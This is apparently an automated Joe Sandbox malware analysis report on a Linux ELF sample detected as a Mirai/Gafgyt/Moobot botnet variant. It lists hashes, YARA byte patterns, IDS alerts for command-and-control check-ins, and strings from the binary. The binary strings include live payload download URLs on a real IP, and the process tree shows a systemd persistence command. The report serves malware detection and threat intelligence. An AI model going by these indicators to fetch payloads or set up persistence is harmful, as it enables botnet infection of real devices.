Edit tour

Linux Analysis Report
na.elf

Overview

General Information

Sample name:	na.elf
Analysis ID:	1528129
MD5:	535cff3a16d579f89346b0916110d25e
SHA1:	a6f65c0f3be7ee71b23973624c60f89ce3bf8f3b
SHA256:	c6be94538af0c32feb17a797fb510bac68f85310700df4b84ea6bb31aa5b5bf2
Tags:	elfuser-abuse_ch
Infos:

Detection

Mirai, Gafgyt, Moobot, Okiru

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Detected Mirai

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Gafgyt

Yara detected Moobot

Yara detected Okiru

Connects to many ports of the same IP (likely port scanning)

Machine Learning detection for sample

Detected TCP or UDP traffic on non-standard ports

Executes commands using a shell command-line interpreter

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Yara signature match

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528129
Start date and time:	2024-10-07 16:22:33 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	na.elf
Detection:	MAL
Classification:	mal100.troj.linELF@0/2@32/0

Runtime Messages

Command:	/tmp/na.elf
PID:	5452
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	bolu_botnet_done.
Standard Error:

Process Tree

system is lnxubuntu20

na.elf (PID: 5452, Parent: 5376, MD5: 535cff3a16d579f89346b0916110d25e) Arguments: /tmp/na.elf

na.elf New Fork (PID: 5453, Parent: 5452)

na.elf New Fork (PID: 5454, Parent: 5452)

sh (PID: 5454, Parent: 5452, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable sbolo.service > /dev/null 2>&1"

sh New Fork (PID: 5455, Parent: 5454)

systemctl (PID: 5455, Parent: 5454, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable sbolo.service

na.elf New Fork (PID: 5459, Parent: 5452)

systemd New Fork (PID: 5457, Parent: 5456)

snapd-env-generator (PID: 5457, Parent: 5456, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Name	Description	Attribution	Blogpost URLs	Link
Bashlite, Gafgyt	Bashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.	No Attribution	http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/ https://blog.cyber5w.com/gafgyt-backdoor-analysis https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/ https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/ https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite

Name	Description	Attribution	Blogpost URLs	Link
MooBot		No Attribution	https://blog.netlab.360.com/ddos-botnet-moobot-en/ https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/ https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/ https://media.defense.gov/2024/Feb/27/2003400753/-1/-1/0/CSA-RUSSIAN-ACTORS-USE-ROUTERS-FACILITATE-CYBER_OPERATIONS.PDF https://otx.alienvault.com/pulse/6075b645942d5adf9bb8949b	https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
na.elf	JoeSecurity_Gafgyt	Yara detected Gafgyt	Joe Security
na.elf	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
na.elf	JoeSecurity_Moobot	Yara detected Moobot	Joe Security
na.elf	Linux_Trojan_Gafgyt_9e9530a7	unknown	unknown	0xf1e4:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
na.elf	Linux_Trojan_Gafgyt_807911a2	unknown	unknown	0xf9b3:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
na.elf	Linux_Trojan_Gafgyt_d4227dbf	unknown	unknown	0xc336:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00 0x118c4:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
na.elf	Linux_Trojan_Gafgyt_d996d335	unknown	unknown	0x12766:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
na.elf	Linux_Trojan_Gafgyt_d0c57a2e	unknown	unknown	0x17bbe:$a: 07 0F B6 57 01 C1 E0 08 09 D0 89 06 0F BE 47 02 C1 E8 1F 89
na.elf	Linux_Trojan_Gafgyt_620087b9	unknown	unknown	0xf573:$a: 48 89 D8 48 83 C8 01 EB 04 48 8B 76 10 48 3B 46 08 72 F6 48 8B
na.elf	Linux_Trojan_Gafgyt_0cd591cd	unknown	unknown	0x15c6e:$a: 4E F8 48 8D 4E D8 49 8D 42 E0 48 83 C7 03 EB 6B 4C 8B 46 F8 48 8D
na.elf	Linux_Trojan_Gafgyt_33b4111a	unknown	unknown	0xf83e:$a: C1 83 E1 0F 74 1A B8 10 00 00 00 48 29 C8 48 8D 0C 02 48 89 DA 48
na.elf	Linux_Trojan_Gafgyt_a33a8363	unknown	unknown	0x15e67:$a: 41 88 02 48 85 D2 75 ED 5A 5B 5D 41 5C 41 5D 4C 89 F0 41 5E
na.elf	Linux_Trojan_Mirai_520deeb8	unknown	unknown	0x4ea:$a: ED 48 89 44 24 30 44 89 6C 24 10 7E 47 48 89 C1 44 89 E8 44
na.elf	Linux_Trojan_Mirai_6a77af0f	unknown	unknown	0x6f3f:$a: 31 D1 89 0F 48 83 C7 04 85 F6 7E 3B 44 89 C8 45 89 D1 45 89 C2 41
na.elf	Linux_Trojan_Mirai_01e4a728	unknown	unknown	0x5ed:$a: 44 24 23 48 8B 6C 24 28 83 F9 01 4A 8D 14 20 0F B6 02 88 45 08
na.elf	Linux_Trojan_Mirai_e0cf29e2	unknown	unknown	0x5262:$a: 83 FE 01 76 12 0F B7 07 83 EE 02 48 83 C7 02 48 01 C2 83 FE 01
Click to see the 11 entries

Memory Dumps

Source	Rule	Description	Author	Strings
5452.1.0000000000400000.000000000041c000.r-x.sdmp	JoeSecurity_Gafgyt	Yara detected Gafgyt	Joe Security
5452.1.0000000000400000.000000000041c000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
5452.1.0000000000400000.000000000041c000.r-x.sdmp	JoeSecurity_Moobot	Yara detected Moobot	Joe Security
5452.1.0000000000400000.000000000041c000.r-x.sdmp	Linux_Trojan_Gafgyt_9e9530a7	unknown	unknown	0xf1e4:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
5452.1.0000000000400000.000000000041c000.r-x.sdmp	Linux_Trojan_Gafgyt_807911a2	unknown	unknown	0xf9b3:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
5452.1.0000000000400000.000000000041c000.r-x.sdmp	Linux_Trojan_Gafgyt_d4227dbf	unknown	unknown	0xc336:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00 0x118c4:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
5452.1.0000000000400000.000000000041c000.r-x.sdmp	Linux_Trojan_Gafgyt_d996d335	unknown	unknown	0x12766:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
5452.1.0000000000400000.000000000041c000.r-x.sdmp	Linux_Trojan_Gafgyt_d0c57a2e	unknown	unknown	0x17bbe:$a: 07 0F B6 57 01 C1 E0 08 09 D0 89 06 0F BE 47 02 C1 E8 1F 89
5452.1.0000000000400000.000000000041c000.r-x.sdmp	Linux_Trojan_Gafgyt_620087b9	unknown	unknown	0xf573:$a: 48 89 D8 48 83 C8 01 EB 04 48 8B 76 10 48 3B 46 08 72 F6 48 8B
5452.1.0000000000400000.000000000041c000.r-x.sdmp	Linux_Trojan_Gafgyt_0cd591cd	unknown	unknown	0x15c6e:$a: 4E F8 48 8D 4E D8 49 8D 42 E0 48 83 C7 03 EB 6B 4C 8B 46 F8 48 8D
5452.1.0000000000400000.000000000041c000.r-x.sdmp	Linux_Trojan_Gafgyt_33b4111a	unknown	unknown	0xf83e:$a: C1 83 E1 0F 74 1A B8 10 00 00 00 48 29 C8 48 8D 0C 02 48 89 DA 48
5452.1.0000000000400000.000000000041c000.r-x.sdmp	Linux_Trojan_Gafgyt_a33a8363	unknown	unknown	0x15e67:$a: 41 88 02 48 85 D2 75 ED 5A 5B 5D 41 5C 41 5D 4C 89 F0 41 5E
5452.1.0000000000400000.000000000041c000.r-x.sdmp	Linux_Trojan_Mirai_520deeb8	unknown	unknown	0x4ea:$a: ED 48 89 44 24 30 44 89 6C 24 10 7E 47 48 89 C1 44 89 E8 44
5452.1.0000000000400000.000000000041c000.r-x.sdmp	Linux_Trojan_Mirai_6a77af0f	unknown	unknown	0x6f3f:$a: 31 D1 89 0F 48 83 C7 04 85 F6 7E 3B 44 89 C8 45 89 D1 45 89 C2 41
5452.1.0000000000400000.000000000041c000.r-x.sdmp	Linux_Trojan_Mirai_01e4a728	unknown	unknown	0x5ed:$a: 44 24 23 48 8B 6C 24 28 83 F9 01 4A 8D 14 20 0F B6 02 88 45 08
5452.1.0000000000400000.000000000041c000.r-x.sdmp	Linux_Trojan_Mirai_e0cf29e2	unknown	unknown	0x5262:$a: 83 FE 01 76 12 0F B7 07 83 EE 02 48 83 C7 02 48 01 C2 83 FE 01
Process Memory Space: na.elf PID: 5452	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Process Memory Space: na.elf PID: 5452	JoeSecurity_Moobot	Yara detected Moobot	Joe Security
Click to see the 13 entries

Suricata Signatures

ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T16:23:18.977987+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60012	91.200.103.117	23561	TCP
2024-10-07T16:23:23.800327+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60014	91.200.103.117	23561	TCP
2024-10-07T16:23:28.351917+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60016	91.200.103.117	23561	TCP
2024-10-07T16:23:35.989973+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60018	91.200.103.117	23561	TCP
2024-10-07T16:23:47.820418+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60020	91.200.103.117	23561	TCP
2024-10-07T16:23:56.446305+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60022	91.200.103.117	23561	TCP
2024-10-07T16:24:08.113075+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60024	91.200.103.117	23561	TCP
2024-10-07T16:24:10.727857+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60026	91.200.103.117	23561	TCP
2024-10-07T16:24:15.442946+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60028	91.200.103.117	23561	TCP
2024-10-07T16:24:18.156729+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60030	91.200.103.117	23561	TCP
2024-10-07T16:24:21.784212+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60032	91.200.103.117	23561	TCP
2024-10-07T16:24:32.795048+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60034	91.200.103.117	23561	TCP
2024-10-07T16:24:43.413248+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60036	91.200.103.117	23561	TCP
2024-10-07T16:24:49.061773+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60038	91.200.103.117	23561	TCP
2024-10-07T16:24:52.790287+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60040	91.200.103.117	23561	TCP
2024-10-07T16:24:59.417908+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60042	91.200.103.117	23561	TCP
2024-10-07T16:25:08.087657+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60044	91.200.103.117	23561	TCP
2024-10-07T16:25:12.768389+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60046	91.200.103.117	23561	TCP
2024-10-07T16:25:22.401937+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60048	91.200.103.117	23561	TCP
2024-10-07T16:25:25.059438+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60050	91.200.103.117	23561	TCP
2024-10-07T16:25:33.713552+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60052	91.200.103.117	23561	TCP
2024-10-07T16:25:43.368163+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60054	91.200.103.117	23561	TCP
2024-10-07T16:25:51.012679+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60056	91.200.103.117	23561	TCP
2024-10-07T16:26:02.655537+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60058	91.200.103.117	23561	TCP
2024-10-07T16:26:12.352464+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60060	91.200.103.117	23561	TCP
2024-10-07T16:26:19.445450+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60062	91.200.103.117	23561	TCP
2024-10-07T16:26:29.074585+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60064	91.200.103.117	23561	TCP
2024-10-07T16:26:39.705358+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60066	91.200.103.117	23561	TCP
2024-10-07T16:26:46.292582+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60068	91.200.103.117	23561	TCP
2024-10-07T16:26:48.948300+0200	2030490	1	Malware Command and Control Activity Detected	192.168.2.13	60070	91.200.103.117	23561	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: na.elf

ReversingLabs: Detection: 57%

Machine Learning detection for sample

Source: na.elf

Joe Sandbox ML: detected

Source: na.elf

String: HTTP/1.1 200 OKbolubotnetarmbolubotnetarm5bolubotnetarm6bolubotnetarm7bolubotnetmipsbolubotnetmpslbolubotnetx86_64bolubotnetsh4abcdefghijklmnopqrstuvwxyz/proc/%d/exe/tmp/%s%s%c/proc/self/cmdline/proc/%d/proc/self/proc/proc/%d/cmdlinenetstatwgetcurl/bin/busybox/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemdshellmnt/sys/boot/media/apache2srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spoolsshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/.x86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppcx86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppc.anko-app/ankosample _8182T_1104/usr/libexec/openssh/sftp-serverW

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60012 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60018 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60024 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60030 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60026 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60016 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60042 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60040 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60028 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60022 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60038 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60034 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60066 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60014 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60058 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60062 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60050 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60052 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60036 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60060 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60032 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60068 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60044 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60056 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60064 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60046 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60070 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60054 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60048 -> 91.200.103.117:23561
Source: Network traffic	Suricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.13:60020 -> 91.200.103.117:23561

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 91.200.103.117 ports 1,2,3,5,6,23561

Source: global traffic

TCP traffic: 192.168.2.13:60012 -> 91.200.103.117:23561

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: yi0key.heleh.com.vn
Source: global traffic	DNS traffic detected: DNS query: daisy.ubuntu.com

Source: na.elf	String found in binary or memory: http://91.200.103.117/%s
Source: na.elf, 5452.1.00000000016e2000.00000000016e4000.rw-.sdmp, sbolo.service.12.dr	String found in binary or memory: http://91.200.103.117/bolubotnetx86_64

System Summary

Malicious sample detected (through community Yara rule)

Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_520deeb8 Author: unknown
Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_01e4a728 Author: unknown
Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: HTTP/1.1 200 OKbolubotnetarmbolubotnetarm5bolubotnetarm6bolubotnetarm7bolubotnetmipsbolubotnetmpslbolubotnetx86_64bolubotnetsh4abcdefghijklmnopqrstuvwxyz/proc/%d/exe/tmp/%s%s%c/proc/self/cmdline/proc/%d/proc/self/proc/proc/%d/cmdlinenetstatwgetcurl/bin/busybox/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemdshellmnt/sys/boot/media/apache2srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spoolsshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/.x86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppcx86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppc.anko-app/ankosample _8182T_1104/usr/libexec/openssh/sftp-serverW

Source: ELF static info symbol of initial sample

.symtab present: no

Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
